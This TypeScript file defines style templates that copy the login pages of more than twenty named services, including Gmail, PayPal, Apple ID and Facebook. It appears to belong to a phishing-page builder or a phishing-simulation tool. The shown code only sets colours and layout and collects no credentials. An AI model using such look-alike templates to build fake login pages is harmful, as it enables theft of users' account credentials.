// Exact login form templates for specific platforms
// Each template replicates the actual platform's login page design

export interface LoginTemplate {
  id: string
  name: string
  platform: string
  category: 'social' | 'email' | 'ecommerce' | 'streaming' | 'business' | 'payment' | 'other'
  colors: {
    primary: string
    secondary?: string
    background: string
    formBackground: string
    text: string
    inputBackground: string
    inputBorder: string
    inputText: string
    buttonBackground: string
    buttonText: string
    linkColor?: string
  }
  layout: {
    formWidth: string
    inputHeight: string
    inputPadding: string
    inputBorderRadius: string
    inputBorderWidth: string
    buttonBorderRadius: string
    buttonHeight?: string
    formGap: string
    fontSize: string
    fontFamily?: string
  }
  features: {
    showLogo: boolean
    showTagline: boolean
    centeredLayout: boolean
    shadow: string
    formPadding?: string
  }
}

export const LOGIN_TEMPLATES: Record<string, LoginTemplate> = {
  custom: {
    id: 'custom',
    name: 'Custom Design',
    platform: 'Custom',
    category: 'other',
    colors: {
      primary: '#ec4899',
      background: '#f3f4f6',
      formBackground: '#ffffff',
      text: '#111827',
      inputBackground: '#f9fafb',
      inputBorder: '#d1d5db',
      inputText: '#111827',
      buttonBackground: '#ec4899',
      buttonText: '#ffffff',
    },
    layout: {
      formWidth: '420px',
      inputHeight: '56px',
      inputPadding: '16px 20px',
      inputBorderRadius: '16px',
      inputBorderWidth: '2px',
      buttonBorderRadius: '16px',
      formGap: '24px',
      fontSize: '16px',
    },
    features: {
      showLogo: true,
      showTagline: true,
      centeredLayout: true,
      shadow: '0 25px 50px -12px rgba(0, 0, 0, 0.25)',
    },
  },

  // ==================== SOCIAL MEDIA PLATFORMS ====================
  
  facebook: {
    id: 'facebook',
    name: 'Facebook',
    platform: 'Facebook',
    category: 'social',
    colors: {
      primary: '#1877f2',
      secondary: '#42b72a',
      background: '#f0f2f5',
      formBackground: '#ffffff',
      text: '#1c1e21',
      inputBackground: '#ffffff',
      inputBorder: '#dddfe2',
      inputText: '#1c1e21',
      buttonBackground: '#1877f2',
      buttonText: '#ffffff',
      linkColor: '#1877f2',
    },
    layout: {
      formWidth: '396px',
      inputHeight: '52px',
      inputPadding: '14px 16px',
      inputBorderRadius: '6px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '6px',
      buttonHeight: '48px',
      formGap: '12px',
      fontSize: '17px',
      fontFamily: 'Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1)',
      formPadding: '24px',
    },
  },

  instagram: {
    id: 'instagram',
    name: 'Instagram',
    platform: 'Instagram',
    category: 'social',
    colors: {
      primary: '#0095f6',
      background: '#fafafa',
      formBackground: '#ffffff',
      text: '#262626',
      inputBackground: '#fafafa',
      inputBorder: '#dbdbdb',
      inputText: '#262626',
      buttonBackground: '#0095f6',
      buttonText: '#ffffff',
      linkColor: '#00376b',
    },
    layout: {
      formWidth: '350px',
      inputHeight: '38px',
      inputPadding: '9px 8px',
      inputBorderRadius: '3px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '8px',
      buttonHeight: '32px',
      formGap: '8px',
      fontSize: '14px',
      fontFamily: '-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 0 1px rgba(0,0,0,0.15)',
      formPadding: '40px',
    },
  },

  twitter: {
    id: 'twitter',
    name: 'X (Twitter)',
    platform: 'X / Twitter',
    category: 'social',
    colors: {
      primary: '#000000',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#0f1419',
      inputBackground: '#ffffff',
      inputBorder: '#cfd9de',
      inputText: '#0f1419',
      buttonBackground: '#000000',
      buttonText: '#ffffff',
      linkColor: '#1d9bf0',
    },
    layout: {
      formWidth: '400px',
      inputHeight: '56px',
      inputPadding: '12px 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '9999px',
      buttonHeight: '52px',
      formGap: '20px',
      fontSize: '17px',
      fontFamily: 'TwitterChirp, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: 'none',
      formPadding: '32px',
    },
  },

  linkedin: {
    id: 'linkedin',
    name: 'LinkedIn',
    platform: 'LinkedIn',
    category: 'social',
    colors: {
      primary: '#0a66c2',
      secondary: '#70b5f9',
      background: '#f3f2ef',
      formBackground: '#ffffff',
      text: '#000000',
      inputBackground: '#ffffff',
      inputBorder: '#8f8f8f',
      inputText: '#000000',
      buttonBackground: '#0a66c2',
      buttonText: '#ffffff',
      linkColor: '#0a66c2',
    },
    layout: {
      formWidth: '400px',
      inputHeight: '52px',
      inputPadding: '12px 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '24px',
      buttonHeight: '52px',
      formGap: '16px',
      fontSize: '16px',
      fontFamily: '-apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", "Fira Sans", Ubuntu, Oxygen, "Oxygen Sans", Cantarell, "Droid Sans", "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Lucida Grande", Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: true,
      centeredLayout: true,
      shadow: '0 4px 12px rgba(0,0,0,0.15)',
      formPadding: '24px',
    },
  },

  tiktok: {
    id: 'tiktok',
    name: 'TikTok',
    platform: 'TikTok',
    category: 'social',
    colors: {
      primary: '#fe2c55',
      secondary: '#25f4ee',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#161823',
      inputBackground: '#f1f1f2',
      inputBorder: 'transparent',
      inputText: '#161823',
      buttonBackground: '#fe2c55',
      buttonText: '#ffffff',
      linkColor: '#fe2c55',
    },
    layout: {
      formWidth: '380px',
      inputHeight: '48px',
      inputPadding: '12px 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '0px',
      buttonBorderRadius: '4px',
      buttonHeight: '48px',
      formGap: '12px',
      fontSize: '15px',
      fontFamily: 'TikTokFont, Arial, Tahoma, PingFangSC, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 2px 8px rgba(0,0,0,0.06)',
      formPadding: '32px',
    },
  },

  pinterest: {
    id: 'pinterest',
    name: 'Pinterest',
    platform: 'Pinterest',
    category: 'social',
    colors: {
      primary: '#e60023',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#211922',
      inputBackground: '#ffffff',
      inputBorder: '#cdcbcd',
      inputText: '#211922',
      buttonBackground: '#e60023',
      buttonText: '#ffffff',
      linkColor: '#5f5f5f',
    },
    layout: {
      formWidth: '400px',
      inputHeight: '48px',
      inputPadding: '14px 16px',
      inputBorderRadius: '16px',
      inputBorderWidth: '2px',
      buttonBorderRadius: '24px',
      buttonHeight: '48px',
      formGap: '12px',
      fontSize: '16px',
      fontFamily: '-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Fira Sans", "Droid Sans", "Helvetica Neue", Helvetica, "ヒラギノ角ゴ Pro W3", "Hiragino Kaku Gothic Pro", メイリオ, Meiryo, "ＭＳ Ｐゴシック", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 0 8px rgba(0,0,0,0.1)',
      formPadding: '48px',
    },
  },

  snapchat: {
    id: 'snapchat',
    name: 'Snapchat',
    platform: 'Snapchat',
    category: 'social',
    colors: {
      primary: '#fffc00',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#000000',
      inputBackground: '#f7f7f7',
      inputBorder: '#e6e6e6',
      inputText: '#000000',
      buttonBackground: '#fffc00',
      buttonText: '#000000',
      linkColor: '#0fadff',
    },
    layout: {
      formWidth: '400px',
      inputHeight: '50px',
      inputPadding: '0 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '30px',
      buttonHeight: '50px',
      formGap: '16px',
      fontSize: '15px',
      fontFamily: '"Graphik Webfont",-apple-system,BlinkMacSystemFont,"Helvetica Neue",Helvetica,Arial,sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 2px 10px rgba(0,0,0,0.1)',
      formPadding: '40px',
    },
  },

  reddit: {
    id: 'reddit',
    name: 'Reddit',
    platform: 'Reddit',
    category: 'social',
    colors: {
      primary: '#ff4500',
      background: '#dae0e6',
      formBackground: '#ffffff',
      text: '#1c1c1c',
      inputBackground: '#f6f7f8',
      inputBorder: '#edeff1',
      inputText: '#1c1c1c',
      buttonBackground: '#ff4500',
      buttonText: '#ffffff',
      linkColor: '#0079d3',
    },
    layout: {
      formWidth: '380px',
      inputHeight: '48px',
      inputPadding: '0 16px',
      inputBorderRadius: '20px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '20px',
      buttonHeight: '40px',
      formGap: '16px',
      fontSize: '14px',
      fontFamily: '-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 2px 4px rgba(0,0,0,0.1)',
      formPadding: '32px',
    },
  },

  // ==================== EMAIL PROVIDERS ====================

  gmail: {
    id: 'gmail',
    name: 'Gmail',
    platform: 'Gmail / Google',
    category: 'email',
    colors: {
      primary: '#1a73e8',
      secondary: '#5f6368',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#202124',
      inputBackground: '#ffffff',
      inputBorder: '#dadce0',
      inputText: '#202124',
      buttonBackground: '#1a73e8',
      buttonText: '#ffffff',
      linkColor: '#1a73e8',
    },
    layout: {
      formWidth: '448px',
      inputHeight: '56px',
      inputPadding: '13px 15px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '4px',
      buttonHeight: '40px',
      formGap: '24px',
      fontSize: '16px',
      fontFamily: '"Google Sans", Roboto, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: true,
      centeredLayout: true,
      shadow: '0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24)',
      formPadding: '48px 40px',
    },
  },

  yahoo: {
    id: 'yahoo',
    name: 'Yahoo Mail',
    platform: 'Yahoo',
    category: 'email',
    colors: {
      primary: '#6001d2',
      secondary: '#5b00c4',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#191e45',
      inputBackground: '#ffffff',
      inputBorder: '#b8b8b8',
      inputText: '#191e45',
      buttonBackground: '#6001d2',
      buttonText: '#ffffff',
      linkColor: '#188fff',
    },
    layout: {
      formWidth: '440px',
      inputHeight: '52px',
      inputPadding: '10px 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '4px',
      buttonHeight: '44px',
      formGap: '18px',
      fontSize: '16px',
      fontFamily: '"Helvetica Neue", Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: true,
      centeredLayout: true,
      shadow: '0 2px 8px rgba(0,0,0,0.1)',
      formPadding: '32px',
    },
  },

  outlook: {
    id: 'outlook',
    name: 'Outlook',
    platform: 'Outlook / Microsoft',
    category: 'email',
    colors: {
      primary: '#0078d4',
      secondary: '#106ebe',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#1b1a19',
      inputBackground: '#ffffff',
      inputBorder: '#8a8886',
      inputText: '#1b1a19',
      buttonBackground: '#0078d4',
      buttonText: '#ffffff',
      linkColor: '#0078d4',
    },
    layout: {
      formWidth: '440px',
      inputHeight: '48px',
      inputPadding: '8px 12px',
      inputBorderRadius: '2px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '2px',
      buttonHeight: '48px',
      formGap: '16px',
      fontSize: '15px',
      fontFamily: '"Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: true,
      centeredLayout: true,
      shadow: '0 2px 6px rgba(0,0,0,0.2)',
      formPadding: '44px 44px 32px',
    },
  },

  // ==================== E-COMMERCE PLATFORMS ====================

  amazon: {
    id: 'amazon',
    name: 'Amazon',
    platform: 'Amazon',
    category: 'ecommerce',
    colors: {
      primary: '#ff9900',
      secondary: '#232f3e',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#0f1111',
      inputBackground: '#ffffff',
      inputBorder: '#a6a6a6',
      inputText: '#0f1111',
      buttonBackground: '#f0c14b',
      buttonText: '#0f1111',
      linkColor: '#007185',
    },
    layout: {
      formWidth: '350px',
      inputHeight: '33px',
      inputPadding: '3px 7px',
      inputBorderRadius: '3px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '3px',
      buttonHeight: '31px',
      formGap: '14px',
      fontSize: '13px',
      fontFamily: 'Amazon Ember, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: 'none',
      formPadding: '20px 26px',
    },
  },

  walmart: {
    id: 'walmart',
    name: 'Walmart',
    platform: 'Walmart',
    category: 'ecommerce',
    colors: {
      primary: '#0071ce',
      secondary: '#ffc220',
      background: '#f2f8fd',
      formBackground: '#ffffff',
      text: '#2e2f32',
      inputBackground: '#ffffff',
      inputBorder: '#b6c1cd',
      inputText: '#2e2f32',
      buttonBackground: '#0071ce',
      buttonText: '#ffffff',
      linkColor: '#0071ce',
    },
    layout: {
      formWidth: '440px',
      inputHeight: '50px',
      inputPadding: '12px 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '4px',
      buttonHeight: '48px',
      formGap: '16px',
      fontSize: '16px',
      fontFamily: 'Bogle, "Helvetica Neue", Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 4px 8px rgba(0,0,0,0.1)',
      formPadding: '40px',
    },
  },

  ebay: {
    id: 'ebay',
    name: 'eBay',
    platform: 'eBay',
    category: 'ecommerce',
    colors: {
      primary: '#e53238',
      secondary: '#0064d2',
      background: '#f7f7f7',
      formBackground: '#ffffff',
      text: '#111820',
      inputBackground: '#ffffff',
      inputBorder: '#767676',
      inputText: '#111820',
      buttonBackground: '#3665f3',
      buttonText: '#ffffff',
      linkColor: '#3665f3',
    },
    layout: {
      formWidth: '400px',
      inputHeight: '48px',
      inputPadding: '0 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '20px',
      buttonHeight: '48px',
      formGap: '16px',
      fontSize: '14px',
      fontFamily: '"Market Sans", Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 1px 2px rgba(0,0,0,0.05)',
      formPadding: '32px',
    },
  },

  // ==================== STREAMING PLATFORMS ====================

  netflix: {
    id: 'netflix',
    name: 'Netflix',
    platform: 'Netflix',
    category: 'streaming',
    colors: {
      primary: '#e50914',
      secondary: '#b20710',
      background: 'rgba(0, 0, 0, 0.75)',
      formBackground: 'rgba(0, 0, 0, 0.75)',
      text: '#ffffff',
      inputBackground: '#333333',
      inputBorder: '#8c8c8c',
      inputText: '#ffffff',
      buttonBackground: '#e50914',
      buttonText: '#ffffff',
      linkColor: '#ffffff',
    },
    layout: {
      formWidth: '450px',
      inputHeight: '50px',
      inputPadding: '16px 20px',
      inputBorderRadius: '4px',
      inputBorderWidth: '0px',
      buttonBorderRadius: '4px',
      buttonHeight: '50px',
      formGap: '16px',
      fontSize: '16px',
      fontFamily: 'Netflix Sans, Helvetica Neue, Segoe UI, Roboto, Ubuntu, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 4px 20px rgba(0,0,0,0.5)',
      formPadding: '60px 68px 40px',
    },
  },

  spotify: {
    id: 'spotify',
    name: 'Spotify',
    platform: 'Spotify',
    category: 'streaming',
    colors: {
      primary: '#1db954',
      background: '#000000',
      formBackground: '#000000',
      text: '#ffffff',
      inputBackground: '#121212',
      inputBorder: '#727272',
      inputText: '#ffffff',
      buttonBackground: '#1db954',
      buttonText: '#000000',
      linkColor: '#1db954',
    },
    layout: {
      formWidth: '450px',
      inputHeight: '48px',
      inputPadding: '14px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '500px',
      buttonHeight: '48px',
      formGap: '16px',
      fontSize: '14px',
      fontFamily: 'spotify-circular, Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: 'none',
      formPadding: '40px 40px 32px',
    },
  },

  hulu: {
    id: 'hulu',
    name: 'Hulu',
    platform: 'Hulu',
    category: 'streaming',
    colors: {
      primary: '#1ce783',
      background: '#0b0c0f',
      formBackground: '#0b0c0f',
      text: '#ffffff',
      inputBackground: '#1a1c20',
      inputBorder: '#53565a',
      inputText: '#ffffff',
      buttonBackground: '#1ce783',
      buttonText: '#0b0c0f',
      linkColor: '#1ce783',
    },
    layout: {
      formWidth: '480px',
      inputHeight: '48px',
      inputPadding: '0 16px',
      inputBorderRadius: '4px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '4px',
      buttonHeight: '48px',
      formGap: '16px',
      fontSize: '15px',
      fontFamily: 'Graphik, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: 'none',
      formPadding: '48px',
    },
  },

  // ==================== PAYMENT PLATFORMS ====================

  paypal: {
    id: 'paypal',
    name: 'PayPal',
    platform: 'PayPal',
    category: 'payment',
    colors: {
      primary: '#0070ba',
      secondary: '#003087',
      background: '#f5f7fa',
      formBackground: '#ffffff',
      text: '#2c2e2f',
      inputBackground: '#ffffff',
      inputBorder: '#cbd2d6',
      inputText: '#2c2e2f',
      buttonBackground: '#0070ba',
      buttonText: '#ffffff',
      linkColor: '#0070ba',
    },
    layout: {
      formWidth: '400px',
      inputHeight: '48px',
      inputPadding: '10px 15px',
      inputBorderRadius: '6px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '30px',
      buttonHeight: '48px',
      formGap: '16px',
      fontSize: '16px',
      fontFamily: '"Helvetica Neue", Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: '0 2px 10px rgba(0,0,0,0.1)',
      formPadding: '32px',
    },
  },

  // ==================== BUSINESS PLATFORMS ====================

  apple: {
    id: 'apple',
    name: 'Apple ID',
    platform: 'Apple',
    category: 'business',
    colors: {
      primary: '#000000',
      secondary: '#1d1d1f',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#1d1d1f',
      inputBackground: '#ffffff',
      inputBorder: '#d2d2d7',
      inputText: '#1d1d1f',
      buttonBackground: '#0071e3',
      buttonText: '#ffffff',
      linkColor: '#0071e3',
    },
    layout: {
      formWidth: '440px',
      inputHeight: '44px',
      inputPadding: '0 16px',
      inputBorderRadius: '12px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '12px',
      buttonHeight: '44px',
      formGap: '16px',
      fontSize: '17px',
      fontFamily: '-apple-system, BlinkMacSystemFont, "SF Pro Text", "SF Pro Icons", "Helvetica Neue", Helvetica, Arial, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: true,
      centeredLayout: true,
      shadow: '0 2px 16px rgba(0,0,0,0.08)',
      formPadding: '40px',
    },
  },

  dropbox: {
    id: 'dropbox',
    name: 'Dropbox',
    platform: 'Dropbox',
    category: 'business',
    colors: {
      primary: '#0061ff',
      background: '#ffffff',
      formBackground: '#ffffff',
      text: '#1e1919',
      inputBackground: '#ffffff',
      inputBorder: '#c6cbd1',
      inputText: '#1e1919',
      buttonBackground: '#0061ff',
      buttonText: '#ffffff',
      linkColor: '#0061ff',
    },
    layout: {
      formWidth: '400px',
      inputHeight: '48px',
      inputPadding: '11px 13px',
      inputBorderRadius: '3px',
      inputBorderWidth: '1px',
      buttonBorderRadius: '6px',
      buttonHeight: '48px',
      formGap: '16px',
      fontSize: '15px',
      fontFamily: 'AtlasGrotesk, "Segoe UI", Tahoma, sans-serif',
    },
    features: {
      showLogo: true,
      showTagline: false,
      centeredLayout: true,
      shadow: 'none',
      formPadding: '40px 48px',
    },
  },
}

export function getTemplate(id: string): LoginTemplate {
  return LOGIN_TEMPLATES[id] || LOGIN_TEMPLATES.custom
}

export function getTemplateList() {
  return Object.values(LOGIN_TEMPLATES)
}

export function getTemplatesByCategory(category: string) {
  return Object.values(LOGIN_TEMPLATES).filter(t => t.category === category)
}

export const TEMPLATE_CATEGORIES = [
  { id: 'all', name: 'All Templates', icon: '🌐' },
  { id: 'social', name: 'Social Media', icon: '👥' },
  { id: 'email', name: 'Email Providers', icon: '✉️' },
  { id: 'ecommerce', name: 'E-Commerce', icon: '🛒' },
  { id: 'streaming', name: 'Streaming', icon: '📺' },
  { id: 'payment', name: 'Payment', icon: '💳' },
  { id: 'business', name: 'Business', icon: '💼' },
  { id: 'other', name: 'Custom', icon: '⚙️' },
]
